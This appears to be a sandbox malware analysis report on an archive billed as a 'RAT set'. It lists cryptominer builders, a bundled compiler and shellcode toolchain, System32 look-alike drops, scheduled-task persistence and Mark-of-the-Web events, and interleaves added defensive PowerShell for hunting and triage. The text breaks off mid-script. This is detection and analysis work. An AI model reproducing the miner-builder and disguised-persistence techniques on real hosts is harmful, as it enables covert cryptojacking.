Malware Analysis Report

2025-04-13 21:13

Sample ID 250315-zpj6gaszfx
Target whoisthisugly's RAT set.rar
SHA256 c866056155f15ef43598ffdfc6d0bc5dd8f2f13b6c07f489c29feb9dbf6287b7
Tags defense_evasion discovery execution
Score 8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score

8/10

SHA256

c866056155f15ef43598ffdfc6d0bc5dd8f2f13b6c07f489c29feb9dbf6287b7

Threat Level: Likely malicious

The file whoisthisugly's RAT set.rar was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion discovery execution

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Executes dropped EXE

Drops file in System32 directory

Drops file in Windows directory

Subvert Trust Controls: Mark-of-the-Web Bypass

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Kills process with taskkill

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

NTFS ADS

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-15 20:54

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-15 20:53

Reported

2025-03-15 21:15

Platform

win11-20250313-en

Max time kernel

1085s

Max time network

1092s

Command Line

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\whoisthisugly's RAT set.rar"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO45491668\Silent XMR Miner Builder.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\donut\donut.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\ddd-miner.exe N/A
N/A N/A C:\Windows\system32\Microsoft\Telemetry\sihost32.exe N/A
N/A N/A C:\Users\Admin\Downloads\ddd-miner.exe N/A
N/A N/A C:\Users\Admin\Downloads\ddd-miner.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\donut\donut.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\donut\donut.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\ddd.exe N/A
N/A N/A C:\Users\Admin\Downloads\ddd.exe N/A
N/A N/A C:\Windows\system32\services32.exe N/A
N/A N/A C:\Windows\system32\Microsoft\Telemetry\sihost32.exe N/A
N/A N/A C:\Users\Admin\Downloads\ddd.exe N/A
N/A N/A C:\Windows\system32\services32.exe N/A
N/A N/A C:\Windows\system32\Microsoft\Telemetry\sihost32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\ddd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow.exe N/A
N/A N/A C:\Windows\system32\services32.exe N/A
N/A N/A C:\Windows\system32\Microsoft\Telemetry\sihost32.exe N/A
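Despite the archive name, the rows above show the contents to be "Silent XMR Miner Builder.exe" and "Silent ETH Miner Builder.exe" together with a build toolchain shipped inside the archive: MinGW gcc, cc1 and windres, tinycc, and a donut.exe (by file name, the open-source shellcode generator of that name). They run first from 7-Zip's temporary extraction folder (7zO454C4998) and then from Downloads\Compilers, followed by the compiled output (ddd.exe, ddd-miner.exe, meow.exe) and the System32 copies. A compiler or shellcode generator launched from Temp or Downloads is a narrow, high-signal hunt. The PowerShell below is an added example and is not part of the sandbox report: it reads Sysmon process-creation events (Event ID 1) and returns the toolchain binaries that ran from a user-writable directory, with parent image and command line. It assumes Sysmon is installed under its default log name; the binary names and directory fragments are taken from the rows above, and the function names are assumed.

```powershell
# Added example (not from the report): hunt Sysmon process-creation telemetry for
# the bundled compiler toolchain running from user-writable directories.
$ToolchainNames = @('gcc.exe', 'cc1.exe', 'windres.exe', 'tcc.exe', 'donut.exe')  # names from the rows above
$UserWritable   = @('\AppData\Local\Temp\', '\Downloads\')                        # directory fragments from the rows above

function ConvertFrom-SysmonEvent {
    # Flatten the <EventData> of one Sysmon record into a hashtable keyed by field name.
    param([Parameter(Mandatory)][System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $xml = [xml]$Event.ToXml()
    $fields = @{}
    foreach ($d in $xml.Event.EventData.Data) { $fields[$d.Name] = $d.'#text' }
    $fields['TimeCreated'] = $Event.TimeCreated
    return $fields
}

function Find-ToolchainFromUserDirs {
    # Sysmon Event ID 1 records whose Image is a toolchain binary under Temp or Downloads.
    param([int]$MaxEvents = 5000)
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 }
    $events = Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        $f = ConvertFrom-SysmonEvent -Event $e
        $image = $f['Image']
        if (-not $image) { continue }
        $leaf = Split-Path -Path $image -Leaf
        if ($ToolchainNames -notcontains $leaf) { continue }   # case-insensitive compare
        $fromUserDir = $false
        foreach ($frag in $UserWritable) {
            if ($image -like "*$frag*") { $fromUserDir = $true; break }
        }
        if (-not $fromUserDir) { continue }
        [pscustomobject]@{
            Time        = $f['TimeCreated']
            Image       = $image
            CommandLine = $f['CommandLine']
            ParentImage = $f['ParentImage']
            User        = $f['User']
            Hashes      = $f['Hashes']
        }
    }
}

# Usage: oldest first, so the gcc/tcc runs line up with the dropped EXEs that follow them.
Find-ToolchainFromUserDirs | Sort-Object Time | Format-Table -AutoSize
```

Without Sysmon the same filter can be run against the Security log (Event ID 4688) once process command-line auditing is enabled, reading NewProcessName and ParentProcessName instead of Image and ParentImage.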

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\services32.exe C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\Microsoft\Telemetry\sihost32.exe C:\Users\Admin\Downloads\ddd-miner.exe N/A
File created C:\Windows\system32\services32.exe C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\services32.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\services32.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\Microsoft\Telemetry\sihost32.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\services32.exe C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\services32.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\Microsoft\Telemetry\sihost32.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\services32.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\Microsoft\Telemetry\sihost32.exe C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\services32.exe C:\Windows\System32\conhost.exe N/A
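The two drop locations above reuse the names of the stock Windows binaries services.exe and sihost.exe with a "32" suffix, and sihost32.exe lands under a System32\Microsoft\Telemetry folder, which is not where Windows keeps sihost.exe. Several rows attribute the writes to conhost.exe; conhost normally hosts the console of another process, so the process column there is likely the console host rather than the writer (the sihost32.exe row names ddd-miner.exe directly). The PowerShell triage check below is an added example and not part of the sandbox report: it tests a host for exactly those paths, records hash and Authenticode status next to the look-alike each one shadows, and looks for live processes, scheduled-task actions and service image paths that point at them (the report lists "Uses Task Scheduler COM API" and "Scheduled Task/Job: Scheduled Task", but those detail rows are not on this page). The path list comes from the rows above; the function names are assumed.

```powershell
# Added triage check (example, not part of the sandbox report). The two paths are
# copied from the "Drops file in System32 directory" rows; function names are assumed.
$DroppedPaths = @(
    'C:\Windows\System32\services32.exe',
    'C:\Windows\System32\Microsoft\Telemetry\sihost32.exe'
)
# Stock Windows binaries whose names the dropped files imitate with a "32" suffix.
$LookAlikes = @{
    'services32.exe' = 'C:\Windows\System32\services.exe'
    'sihost32.exe'   = 'C:\Windows\System32\sihost.exe'
}

function Test-DroppedBinary {
    # Presence, SHA256 and Authenticode status of one dropped path, plus the
    # legitimate binary it shadows so both can be compared in the same table.
    param([Parameter(Mandatory)][string]$Path)
    $leaf = Split-Path -Path $Path -Leaf
    $row  = [ordered]@{
        Path = $Path; Present = $false; SHA256 = $null
        Signature = $null; Signer = $null; Imitates = $LookAlikes[$leaf]
    }
    if (Test-Path -LiteralPath $Path -PathType Leaf) {
        $sig = Get-AuthenticodeSignature -LiteralPath $Path
        $row.Present   = $true
        $row.SHA256    = (Get-FileHash -LiteralPath $Path -Algorithm SHA256).Hash
        $row.Signature = $sig.Status        # the real sihost.exe/services.exe verify as Microsoft-signed
        $row.Signer    = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }
    }
    [pscustomobject]$row
}

function Get-DroppedProcess {
    # Live processes whose image path is one of the dropped locations.
    Get-CimInstance -ClassName Win32_Process |
        Where-Object { $_.ExecutablePath -and ($DroppedPaths -contains $_.ExecutablePath) } |
        Select-Object ProcessId, ParentProcessId, Name, ExecutablePath, CommandLine
}

function Get-DroppedPersistence {
    # Scheduled-task actions and service image paths that reference a dropped binary.
    $leaves = $DroppedPaths | ForEach-Object { Split-Path -Path $_ -Leaf }
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            $exe = $action.Execute
            if (-not $exe) { continue }     # COM-handler actions carry no Execute path
            foreach ($leaf in $leaves) {
                if ($exe -like "*$leaf*") {
                    [pscustomobject]@{
                        Kind = 'ScheduledTask'; Name = ($task.TaskPath + $task.TaskName)
                        Target = $exe; Arguments = $action.Arguments; State = $task.State
                    }
                }
            }
        }
    }
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        foreach ($leaf in $leaves) {
            if ($svc.PathName -like "*$leaf*") {
                [pscustomobject]@{
                    Kind = 'Service'; Name = $svc.Name
                    Target = $svc.PathName; Arguments = $null; State = $svc.State
                }
            }
        }
    }
}

# Usage: run elevated so System32 and the task store are readable.
$DroppedPaths | ForEach-Object { Test-DroppedBinary -Path $_ } | Format-Table -AutoSize
Get-DroppedProcess     | Format-Table -AutoSize
Get-DroppedPersistence | Format-Table -AutoSize
```

A dropped file that is present and reports NotSigned while its look-alike verifies as Microsoft-signed is the expected picture; an empty persistence table does not clear the host, since the report's scheduled-task rows are not shown here and the task name is unknown.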

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SystemTemp C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5932_1600356437\LICENSE C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5932_1600356437\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5932_1600356437\sets.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5932_1600356437\_metadata\verified_contents.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5932_1600356437\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Subvert Trust Controls: Mark-of-the-Web Bypass

defense_evasion
Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\TaskManager Installer.exe:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Users\Admin\Downloads\TaskManager Installer (1).exe:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\TaskManager Installer (2).exe:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
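The three rows above show chrome.exe and msedge.exe opening the Zone.Identifier stream of files they had just written to Downloads. That is also what a browser does when it applies Mark-of-the-Web (ATT&CK T1553.005 is the removal of it), so a write to that stream by the downloading browser is not by itself a bypass; what matters is whether the stream is still present afterwards and which ZoneId it carries. The PowerShell below is an added example and not part of the sandbox report: it reads the stream from every file of a few risky extensions in a folder and flags files that have no stream or a zone below Internet (3). The folder and the "TaskManager Installer" file names are taken from the rows above; the function names are assumed.

```powershell
# Added example (not from the report): audit Mark-of-the-Web on downloaded files.
function Get-MotwInfo {
    # Parse the Zone.Identifier alternate data stream of one file.
    param([Parameter(Mandatory)][string]$Path)
    # The stream is absent on locally created files and on files whose MotW was stripped.
    $raw = Get-Content -LiteralPath $Path -Stream Zone.Identifier -Raw -ErrorAction SilentlyContinue
    if ($null -eq $raw) {
        return [pscustomobject]@{
            File = $Path; HasMotw = $false; ZoneId = $null
            HostUrl = $null; ReferrerUrl = $null; Verdict = 'NO_MOTW'
        }
    }
    # Zone.Identifier is an INI fragment: [ZoneTransfer] / ZoneId=3 / ReferrerUrl=... / HostUrl=...
    $zone    = if ($raw -match '(?m)^ZoneId=(\d+)')          { [int]$Matches[1] } else { $null }
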